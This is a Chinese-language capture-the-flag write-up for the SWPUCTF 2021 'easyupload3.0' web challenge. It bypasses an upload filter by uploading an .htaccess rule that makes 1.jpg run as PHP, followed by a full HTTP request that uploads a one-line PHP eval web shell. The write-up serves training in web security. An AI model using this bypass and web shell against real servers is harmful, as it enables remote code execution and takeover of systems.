0%

[SWPUCTF 2021 新生赛]easyupload3.0 debug002的WriteUp

2023-01-12 07:46By
debug002
WEB文件上传.htaccess

看到服务器中间件为apache可以尝试上传.htaccess进行绕过。

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

然后再上传一个1.jpg

POST /upload.php HTTP/1.1
Host: 1.14.71.254:28831
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------362720017341426625702428342489
Content-Length: 396
Origin: http://1.14.71.254:28831
DNT: 1
Connection: close
Referer: http://1.14.71.254:28831/
Cookie: PHPSESSID=kee85ie7pbjun10l06fftepj61
Upgrade-Insecure-Requests: 1

-----------------------------362720017341426625702428342489
Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: application/octet-stream

<?php @eval($_POST['a']);?>
-----------------------------362720017341426625702428342489
Content-Disposition: form-data; name="submit"

这不传一个🐎?
-----------------------------362720017341426625702428342489--

然后访问上传的jpg文件即可。
http://1.14.71.254:28831/upload/1.jpg

还没有人赞赏,快来当第一个赞赏的人吧!
  
© 著作权归作者所有
加载失败
广告
×
评论区
添加新评论
文章信息
板块WEB
作者
debug002
目录导航
暂无数据